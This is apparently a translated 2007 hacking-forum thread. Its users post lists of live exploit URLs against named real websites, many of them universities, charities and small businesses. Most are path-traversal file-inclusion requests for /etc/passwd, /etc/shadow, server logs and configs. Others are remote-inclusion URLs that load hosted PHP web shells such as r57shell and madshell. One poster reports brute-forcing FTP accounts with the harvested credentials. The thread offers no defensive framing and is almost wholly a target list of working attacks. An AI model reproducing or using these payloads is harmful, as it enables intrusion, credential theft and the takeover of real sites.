http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/passwd&cont=2&nota=80
http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/hosts&cont=2&nota=80
http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/group&cont=2&nota=80
http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/services&cont=2&nota=80
http://www.proexc.ufjf.br/index.php?pag=../../../../../etc/ftpusers&cont=2&nota=80
~!DoK_tOR!~
16.06.2007, 02:44
=\\
http://www.dorothyrowe.com.au/index.php?u=../../../../etc/passwd
http://www.dorothyrowe.com.au/index.php?u=../../../../etc/hosts
http://www.dorothyrowe.com.au/index.php?u=../../../../etc/group
http://www.dorothyrowe.com.au/index.php?u=../../../../etc/services
~!DoK_tOR!~
16.06.2007, 02:58
=\\
http://www.bujinkan-ninpo-ryu-geneva.com/index.php?u=[shell]
~!DoK_tOR!~
16.06.2007, 03:26
=\\
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/passwd
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/hosts
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/group
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/services
http://jdzc.ujs.edu.cn/jiaoxue/index.php?f=../../../../../etc/syslog.conf
~!DoK_tOR!~
16.06.2007, 18:47
=\\
http://sdc.missouri.edu/index.php?page=../../../etc/passwd
http://sdc.missouri.edu/index.php?page=../../../etc/group
http://sdc.missouri.edu/index.php?page=../../../etc/syslog.conf
http://sdc.missouri.edu/index.php?page=../../../etc/services
geezer.code
19.06.2007, 01:49
so I've made it here too
http://www.narkote.net/ndstat/reports/index.php?rep=[shell]&per=week
~!DoK_tOR!~
19.06.2007, 21:59
=\\
http://www.kpvm.tv/page.php?page=../../../../../../etc/passwd
http://www.kpvm.tv/page.php?page=../../../../../../etc/hosts
http://www.kpvm.tv/page.php?page=../../../../../../etc/group
http://www.kpvm.tv/page.php?page=../../../../../../etc/services
http://www.kpvm.tv/page.php?page=../../../../../../etc/syslog.conf
The_HuliGun
19.06.2007, 22:11
http://www.la-rose-eternelle.org/index.php?page=[shell]
The_HuliGun
20.06.2007, 09:39
http://www.ph.unimelb.edu.au/events/?link=../../../../../../etc/passwd
http://www.ph.unimelb.edu.au/events/?link=../../../../../../etc/group
http://www.ph.unimelb.edu.au/events/?link=../../../../../../etc/hosts
http://www.ph.unimelb.edu.au/events/?link=../../../../../../etc/services
The_HuliGun
21.06.2007, 08:59
http://www.aeac.org.br/?pg=../../../../../../../etc/passwd
http://www.aeac.org.br/?pg=../../../../../../../etc/group
http://www.aeac.org.br/?pg=../../../../../../../etc/services
http://www.aeac.org.br/?pg=../../../../../../../etc/hosts
The_HuliGun
21.06.2007, 09:16
http://www.conscienciajovem.org/?pagina=[shell]
The_HuliGun
21.06.2007, 09:24
http://www.lasequia.org/alenergia/index.php?pagina=[shell]
The_HuliGun
21.06.2007, 22:16
http://conflictology.ru/index.php?pg=../../../../../../../../../../etc/passwd
http://conflictology.ru/index.php?pg=../../../../../../../../../../etc/groups
http://conflictology.ru/index.php?pg=../../../../../../../../../../etc/services
http://conflictology.ru/index.php?pg=../../../../../../../../../../etc/services
Using login/pass pairs from the /etc/passwd file, I brute-forced three FTP accounts.
The_HuliGun
21.06.2007, 22:21
http://www.mantracvostok.ru/russian/page.php?pg=[shell]
~!DoK_tOR!~
22.06.2007, 04:22
=\\
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/passwd
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/hosts
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/syslog.conf
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/services
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/ftpusers
http://www.reiters.com/index.cgi?f=i&what=../../../../../etc/group
~!DoK_tOR!~
22.06.2007, 04:48
=\\
http://www.rennsportnews.de/index.php?load=../../../../../etc/passwd
http://www.rennsportnews.de/index.php?load=../../../../../etc/hosts
http://www.rennsportnews.de/index.php?load=../../../../../etc/services
http://www.rennsportnews.de/index.php?load=../../../../../etc/group
~!DoK_tOR!~
22.06.2007, 04:56
=\\
http://www.motos-gaz.ch/index.php?nav=../../../../../etc/passwd
http://www.motos-gaz.ch/index.php?nav=../../../../../etc/hosts
http://www.motos-gaz.ch/index.php?nav=../../../../../etc/services
http://www.motos-gaz.ch/index.php?nav=../../../../../etc/group
The_HuliGun
22.06.2007, 07:34
http://www.internetelite.ru/medprom/index.phtml?part=[shell]
http://www.superyacht.de/bex.phtml?content=[url]
The_HuliGun
22.06.2007, 17:34
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/passwd%00
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/group%00
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/ftpusers%00
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/hosts%00
http://www.dircom.udep.edu.pe/index.php?t=../../../../../../../../../etc/services%00
The_HuliGun
23.06.2007, 09:04
2+StArT+:
Don't repost! Isn't KPOT_find maintaining the ANTI-REPOST list (http://www.downloads.xclan.ru/php-include.php) for everyone?
Here's a remote include for you:
http://www.tgwashington.org/old/index.php?pg=[shell]
The_HuliGun
23.06.2007, 15:58
2+StArT+:
Kid, where are you rushing off to?
You've been told, reposting is bad!
Stop posting what people posted long before you!
Local include:
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/passwd%00
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/group%00
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/hosts%00
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/services%00
http://home.no.net/taikido/show.php?page=../../../../../../../../etc/syslog.conf%00
http://tanatos.ru/index.php?nav=/../../../../../../etc/passwd%00&id=17
http://tanatos.ru/index.php?nav=../../../../../../../../../../../usr/local/etc/apache2/httpd.conf%00&id=17
http://tanatos.ru/index.php?nav=../../../../../../../../../../../usr/local/www/pwd%00&id=17
~!DoK_tOR!~
24.06.2007, 02:25
=\\
http://www.ksiazkiknk.pl/index.php?site=../../../../../etc/passwd&id=2447&desc=full
http://www.ksiazkiknk.pl/index.php?site=../../../../../etc/group&id=2447&desc=full
http://www.ksiazkiknk.pl/index.php?site=../../../../../etc/hosts&id=2447&desc=full
_Master-
26.06.2007, 17:30
http://www.spa-nyc.com/custompage.php?include=../../../../../../etc/passwd
2+StArT+:
Don't repost! Isn't KPOT_find maintaining the ANTI-REPOST list (http://www.downloads.xclan.ru/php-include.php) for everyone?
Sorry, it won't happen again. =)
__________________________________________________ _
www.teaching.iub.edu
TEACHING & LEARNING Indiana University Teaching Handbook
.................................................. ................................
http://teaching.iub.edu/finder/wrapper.php?inc_id=../../../../../etc/hosts
http://teaching.iub.edu/finder/wrapper.php?inc_id=../../../../../etc/passwd
http://teaching.iub.edu/finder/wrapper.php?inc_id=../../../../../etc/ftpusers
http://teaching.iub.edu/finder/wrapper.php?inc_id=../../../../../etc/syslog.conf
.................................................. ................................
www.sportmaster.ru/tm.php?site=http://www.ya.ru
kair, so what? The page just gets framed
<frameset rows="20,*" frameborder="NO" border=false>
<frame src="/ssi/shap_opt.html" name="topfrm" marginheight="0" marginweight="0" scrolling="NO" frameborder="NO">
<frame src="http://google.com" name="mainfrm" scrolling="auto" frameborder="NO">
At least look at what you're posting, for fuck's sake
~!DoK_tOR!~
28.06.2007, 19:58
=\\
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/passwd
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/group
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/hosts
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/services
http://www.gtlib.gatech.edu/pub/handhelds.org/distributions/intimate/beta/etc/syslog.conf
~!DoK_tOR!~
28.06.2007, 20:03
=\\
http://sssg1.whoi.edu/swap2/ftp/sources/build/etc/passwd
http://sssg1.whoi.edu/swap2/ftp/sources/build/etc/hosts
http://sssg1.whoi.edu/swap2/ftp/sources/build/etc/group
~!DoK_tOR!~
28.06.2007, 20:58
=\\
Remote include
http://www.tmtu.co.kr/test/test.php?page=http://oneline.ucoz.ru/madshell.php -[shell]
~!DoK_tOR!~
28.06.2007, 21:05
=\\
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/passwd&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/hosts&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/group&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/syslog.conf&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=../../../../../etc/ftpusers&id=30
http://sci.nctu.edu.tw/index.php?now=maga&page=/../../../../../etc/services&id=30
http://www.amsimon.com/guestbook/admin.php?action=list&tmp_theme=../../../../../etc/passwd
http://www.maris.gr/guestbook/kisgb/view_private.php?start=252&action=edit&tmp_theme=../../../../../../etc/passwd
/=
1. Unix.
http://infocentrum.opava.cz/index2.php?file=[url] (without .php)
The_HuliGun
30.06.2007, 22:27
http://www.velvethills.org/index.php?page=../../../../../etc/passwd
http://www.velvethills.org/index.php?page=../../../../../etc/group
http://www.velvethills.org/index.php?page=../../../../../etc/hosts
http://www.velvethills.org/index.php?page=../../../../../etc/ftpusers
http://www.velvethills.org/index.php?page=../../../../../etc/services
http://www.velvethills.org/index.php?page=../../../../../etc/syslog.conf
The logs are at /etc/httpd/logs/acces.log, but there's no read permission :=(
The_HuliGun
30.06.2007, 22:40
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/passwd
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/group
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/syslog.conf
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/services
http://www.faith-life.org/smallgroups/index.php?page=../../../../etc/hosts
The_HuliGun
30.06.2007, 22:51
http://od.thinkhead.com/index.php?page=../../../../../../etc/passwd
http://od.thinkhead.com/index.php?page=../../../../../../etc/hosts
http://od.thinkhead.com/index.php?page=../../../../../../etc/group
http://od.thinkhead.com/index.php?page=../../../../../../etc/services
Logs
http://od.thinkhead.com/index.php?page=../../../../../../usr/local/apache/logs/access_log
http://od.thinkhead.com/index.php?page=../../../../../../usr/local/apache/logs/error_log
The_HuliGun
30.06.2007, 23:10
http://www.boroondarabrass.org/index.php?page=../../../../../etc/passwd
http://www.boroondarabrass.org/index.php?page=../../../../../etc/group
http://www.boroondarabrass.org/index.php?page=../../../../../etc/ftpusers
http://www.boroondarabrass.org/index.php?page=../../../../../etc/hosts
http://www.boroondarabrass.org/index.php?page=../../../../../etc/services
The_HuliGun
30.06.2007, 23:18
http://www.dancehistory.org/index.php?page=../../../../../../etc/passwd
http://www.dancehistory.org/index.php?page=../../../../../../etc/group
http://www.dancehistory.org/index.php?page=../../../../../../etc/hosts
http://www.dancehistory.org/index.php?page=../../../../../../etc/services
The_HuliGun
30.06.2007, 23:31
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/passwd
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/group
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/services
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/syslog.conf
http://www.childrengoldentriangle.org/nl/static/main.php?page=../../../../../../../../../etc/hosts
The_HuliGun
30.06.2007, 23:40
http://www.bizcert.org/index.php?page=../../../../etc/passwd
http://www.bizcert.org/index.php?page=../../../../etc/group
http://www.bizcert.org/index.php?page=../../../../etc/services
http://www.bizcert.org/index.php?page=../../../../etc/ftpusers
LOGS
http://www.bizcert.org/index.php?page=../../../../usr/local/apache/logs/access_log
http://www.bizcert.org/index.php?page=../../../../usr/local/apache/logs/error_log
eStore:
2edo.com
2edo.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd
brewercoinc.com
brewercoinc.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd
birdstheword.com
birdstheword.com//cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd
dailygrindcafeboutique.com
dailygrindcafeboutique.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd
thepartsdude.com
thepartsdude.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd
africansisters.com
http://www.africansisters.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00
urbanbeads.com
http://www.urbanbeads.com/cgi-urbanbeads/search/tseekdir.cgi?location=/etc/passwd%00
ubicol.com
http://www.ubicol.com/cgi-bin/tseek/tseekdir.cgi?location=/etc/passwd%00
globalblogs.com
http://www.globalblogs.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00
maennerseiten.de
http://www.maennerseiten.de/cgi-bin/turboseek/tseekdir.cgi?location=/etc/passwd%00
www.maskeret.com
http://www.maskeret.com/cgi-bin/seek/tseekdir.cgi?location=/etc/passwd%00
EzPay:
tuge2000.com
http://www.tuge2000.com/index.php?read=../../../../../../../../../../../../../../etc/passwd
thedmgroup.com
http://www.thedmgroup.com/etc/passwd
http://www.xpient.com/ubb/ubbt.inc.php?thispath=http://file-hran2006.narod.ru/shell.txt?
safe_mode: OFF
~!DoK_tOR!~
01.07.2007, 19:38
=\\
http://www.giseo.co.kr/index.php?body=../../../../../../etc/group
http://www.giseo.co.kr/index.php?body=../../../../../../etc/hosts
http://www.giseo.co.kr/index.php?body=../../../../../../etc/passwd
http://www.giseo.co.kr/index.php?body=../../../../../../etc/services
http://www.giseo.co.kr/index.php?body=../../../../../../etc/syslog.conf
~!DoK_tOR!~
01.07.2007, 20:46
=\\
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/passwd%00
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/group%00
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/hosts%00
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/services%00
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../etc/syslog.conf%00
Log:
http://www.surgicalpathologyatlas.com/db/index.php?template=/../../../../../../../usr/local/apache/domlogs/savco/surgicalpathologyatlas.com%00
~!DoK_tOR!~
01.07.2007, 22:25
=\\
http://gallery.vakmos.org/index.php?template=../../../../../../../etc/passwd%00
http://gallery.vakmos.org/index.php?template=../../../../../../../etc/group%00
http://gallery.vakmos.org/index.php?template=../../../../../../../etc/hosts%00
http://gallery.vakmos.org/index.php?template=../../../../../../../etc/syslog.conf%00
The_HuliGun
02.07.2007, 09:13
http://www.macsandpcs.net/?page=[shell]
The_HuliGun
02.07.2007, 09:21
http://www.norppa.net/2.0/?page=[shell]
http://actionscripttips.com/index.php?id=../../../../../etc/passwd
http://actionscripttips.com/index.php?id=/../../../../../../../etc/syslog.conf
http://actionscripttips.com/index.php?id=/../../../../../../../etc/services
http://actionscripttips.com/index.php?id=/../../../../../../../etc/hosts
http://actionscripttips.com/index.php?id=/../../../../../../../etc/group
http://www.madison.com/archives/read.php?ref=../../../../../etc/passwd
http://www.madison.com/archives/read.php?ref=/../../../../../../../etc/syslog.conf
http://www.madison.com/archives/read.php?ref=/../../../../../../../etc/services
http://www.madison.com/archives/read.php?ref=/../../../../../../../etc/hosts
http://www.madison.com/archives/read.php?ref=/../../../../../../../etc/group
http://juathuur.spiderforest.com/content.php?page=../../../../../etc/passwd
http://juathuur.spiderforest.com/content.php?page=/../../../../../../../etc/syslog.conf
http://juathuur.spiderforest.com/content.php?page=/../../../../../../../etc/services
http://juathuur.spiderforest.com/content.php?page=/../../../../../../../etc/hosts
http://juathuur.spiderforest.com/content.php?page=/../../../../../../../etc/group
never liked Ivan Franko
http://bioweb.franko.lviv.ua/zoo/museum/index_.php?file=../../../../../etc/shadow
http://bioweb.franko.lviv.ua/zoo/museum/index_.php?file=../../../../../etc/passwd
http://bioweb.franko.lviv.ua/zoo/museum/index_.php?file=../../../../../etc/services
http://moon.mystarseed.com/new/new.php?page=../../../../../etc/passwd%00
http://www.sambura.com/new/new.php?file=[url]
=\
~!DoK_tOR!~
03.07.2007, 02:07
Say no to rock:
http://www.natobata.com.br/?arquivo=bandas.php&titulo=images/tituloBandas.jpg&banda=http://oneline.ucoz.ru/madshell.php
~!DoK_tOR!~
03.07.2007, 02:30
=\\
http://www.villas-and-apartments.com/lanzarote/port.php?content=../../../../etc/passwd
http://www.villas-and-apartments.com/lanzarote/port.php?content=../../../../etc/syslog.conf
http://www.villas-and-apartments.com/lanzarote/port.php?content=../../../../etc/ftpusers
http://www.villas-and-apartments.com/lanzarote/port.php?content=../../../../etc/hosts
http://www.eurekawebs.com/redir_frame.cfm?Path=[SH3LL]
~!DoK_tOR!~
03.07.2007, 03:14
http://www.eurekawebs.com/redir_frame.cfm?Path=[SH3LL]
it's just an ordinary frame, what shell is there here :mad:
1. http://www.itc.virginia.edu/. PR - 7.
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/passwd&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/syslog.conf&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/hosts&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/group&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../etc/services&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../usr/local/apache/logs/access_log&issueID=26
http://www.itc.virginia.edu/lsp/program/lspn.php?image=titleinfocenter.jpg&contfile=/../../../../../../usr/local/apache/logs/error_log&issueID=26
Everything is like on a blank sheet :)
_http://armacaodepera.com/gallery/index.php?template=../../../../../../../../../../../etc/passwd%00
_http://www.ttzezere.com/4images/index.php?cmd=ls%0-la&template=../../data/tmp_media/suntzu1293.jpg%00
2. Linux. PR - 4.
http://www.e-mela.com/viewPage.php?page=[url]
3. Linux. PR - 0. :)
http://www.britishoppression.com/index.php?page=[url]
4. FreeBSD. PR - 2.
http://www.ketchmark.com/netscape1.php?content=[url]
5. Unix. PR - 1.
http://www.bookdjralph.com/index.php?Page=[url]
6. Unix. PR - 1.
http://www.dbrage.net/index6.php?page=[url]
7. Linux. PR - 3.
http://www.eumra.net/portal/html/home/sub.php?id=sub&link=[url]
8. Linux. PR - 3.
http://itihad.org/layout.php?f=[url]
PHP injections for today.
1. Unix. PR - 0. Safe Mode = On. :(
http://www.ex-light.ru/pages/menu.php?id=[url]
2. Linux. PR - 3. Safe Mode = Off. :)
http://www.maagd.net/index.php?id=[url]
3. Unix. PR - 2. Safe Mod = Off.
http://www.samosir.go.id/detail_eng.php?buka=[url]
4. Unix. PR - 3. Safe Mod = Off.
http://www.animemegaverse.com/index.php?id=[url]
5. Linux. PR - 4. Safe Mode = Off.
http://www.kuratorium.krakow.pl/informator/Szko%B3y%20artystyczne/pliki.php?tresc=[url]
6. Unix. PR - 3. Safe Mode = Off.
http://www.dragonballmaster.com/index.php?id=[url]
7. Linux. PR - 3. Safe Mode = Off.
//Was looking for admin panels, stumbled on an include :)
http://www.gafner-informatik.ch/index.php?action=[url]
8. Linux. PR - 2. Safe Mode = On.
//Was looking for an admin panel again, but found an include.
http://www.zss.tarnow.pl/aktualnosci/full.php?plik=[url]
The_HuliGun
06.07.2007, 11:12
www.emule.com
http://www.emule.com/poetry/?page=../../../../../../../../etc/passwd%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/group%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/ftpusers%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/services%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/hosts%00
http://www.emule.com/poetry/?page=../../../../../../../../etc/syslog.conf%00
www.enterpriseplants.com
http://www.enterpriseplants.com/other.php?page=../../../../etc/passwd%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/group%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/hosts%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/ftpusers%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/services%00
http://www.enterpriseplants.com/other.php?page=../../../../etc/syslog.conf%00
www.theactorsretreat.com
http://www.theactorsretreat.com/?page=../../../../../../etc/passwd%00
http://www.theactorsretreat.com/?page=../../../../../../etc/group%00
http://www.theactorsretreat.com/?page=../../../../../../etc/ftpusers%00
http://www.theactorsretreat.com/?page=../../../../../../etc/services%00
Found the logs, but there are no permissions to read them.
http://www.theactorsretreat.com/?page=../../../../../../var/log/httpd/access_log%00
http://www.theactorsretreat.com/?page=../../../../../../var/log/httpd/error_log%00
www.branchmanagerceo.com
http://www.branchmanagerceo.com/?page=../../../../../../../etc/passwd%00
http://www.branchmanagerceo.com/?page=../../../../../../../etc/group%00
http://www.branchmanagerceo.com/?page=../../../../../../../etc/ftpusers%00
http://www.branchmanagerceo.com/?page=../../../../../../../etc/hosts%00
LOGS
http://www.branchmanagerceo.com/?page=../../../../../../../www/logs/error_log%00
www.kerryjohnson.com
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/passwd
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/group
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/ftpusers
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/hosts
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/services
http://www.kerryjohnson.com/index12.php?page=../../../../../etc/syslog.conf
www.sammf.com
http://www.sammf.com/?page=[shell]
www.cookiecr3ations.com
http://www.cookiecr3ations.com/index.php?page=[shell]
www.mapxolutions.com
http://www.mapxolutions.com/page.php?page=[shell]
www.strawsandsugar.com
http://www.strawsandsugar.com/index.php?page=[shell]
ptc36.com
http://ptc36.com/index.php?page=[shell]
~!DoK_tOR!~
07.07.2007, 18:36
=\\
http://web40.xps6.microserver.de/index.php?action=/etc/passwd
http://web40.xps6.microserver.de/index.php?action=/etc/group
http://web40.xps6.microserver.de/index.php?action=/etc/services
http://web40.xps6.microserver.de/index.php?action=/etc/syslog.conf
Shram-spb
07.07.2007, 21:21
=\\
http://web40.xps6.microserver.de/index.php?action=/var/www/html/web40/html/index.php - recursion, though :))
You could DDoS it that way :)
The_HuliGun
08.07.2007, 01:30
1. www.ovz.ch
http://www.ovz.ch/?page=[shell].php
2. www.ironclan.com
http://www.ironclan.com/eX/index.php?page=[shell].txt
3. fouleescholetaises.free.fr
http://fouleescholetaises.free.fr/index_psf.php?page=[shell].php
4. www.ultriplo.com
http://www.ultriplo.com/index.php?page=[shell].php
5. www.gmo-productions.be
http://www.gmo-productions.be/index.php?page=[shell].inc.php
6. muson.com.ua
http://muson.com.ua/products_service/humidifiers/site1.php?page=[shell].php
there used to be something like a game with this name =))
http://www.megabackgammon.com/backgammon-articles/read-articles/index.php?article=[shell]
how nice it is after a shower..... PHP inj. start turning up right away..=)
http://www.gojdic.sk/citaren/?zobrazit=[shell]
http://www.lineage2world.com/main/index.php?p=[index] local include, but it's of no use :(
_http://www.fas. harvard.edu/~semitic/HOAI/adultmain.cgi?article=../../../../../../../../../../../etc/passwd
Here.. been working on this for a long time, maybe it will come in handy for someone =)
_http://www.electhai.com/view.php?id=http://phpxsssql.narod.ru/cmd.htm&cmd=w hich%20fetch
And here's a remote include on a cool Taiwanese server.
These ***** still aren't doing anything...
http://www.postnuke.ru/index.php?module=Static_Docs&func=view&f=../../../../../../../../../../../../../../../../../../../../opt/www/
http://ima-ag.ru/sitemap.php?inc=[url]
http://www.best-trade.ru/txt.php?textid=filials&pic1=foto024.jpg&parent=2&tail=tail.php&head=../../../../../etc/passwd&title1=%C6%C9%CC%C9%C1%CC%D9
http://www.nrcm.ru/main.php?BackGround=bk1.gif&content=http://no.spam.ee/~tonu/phpshell/r57shell.txt?&id=348&Back_Link=main.php
~!DoK_tOR!~
10.07.2007, 02:03
=\\
http://cdeam.ufam.edu.br/index.php?page=/etc/passwd
http://cdeam.ufam.edu.br/index.php?page=/etc/group
http://cdeam.ufam.edu.br/index.php?page=/etc/hosts
http://cdeam.ufam.edu.br/index.php?page=/etc/syslog.conf
http://cdeam.ufam.edu.br/index.php?page=/etc/ftpusers